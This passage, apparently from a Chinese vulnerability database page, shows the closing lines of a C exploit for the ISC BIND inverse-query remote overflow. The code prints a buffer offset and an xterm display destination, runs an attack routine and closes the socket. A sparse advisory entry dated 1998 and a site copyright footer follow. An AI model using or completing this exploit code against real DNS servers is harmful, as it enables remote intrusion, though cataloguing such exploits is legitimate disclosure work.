  printf("anbuff addr offset : %lu\n",offset);
  printf("xterm display dest : %s:0\n",inet_ntoa(xs));
  printf("exploiting . . .\n");

  switch(attack(sock,xs,target[target_index],offset,optimized))
    {
    case -1:
      perror("error: attack");
      return(-1);
      break;

    case 0:
      fprintf(stderr,"error: internal error\n");
      return(-1);
      break;
    }

  if(close(sock)!=0)
    {
      perror("error: close");
      return(-1);
    }

  exit(0);
}		

- 漏洞信息

913
ISC BIND Inverse-Query Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Uncoordinated Disclosure, Discovered in the Wild

- 漏洞描述

Unknown or Incomplete

- 时间线

1998-04-08 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站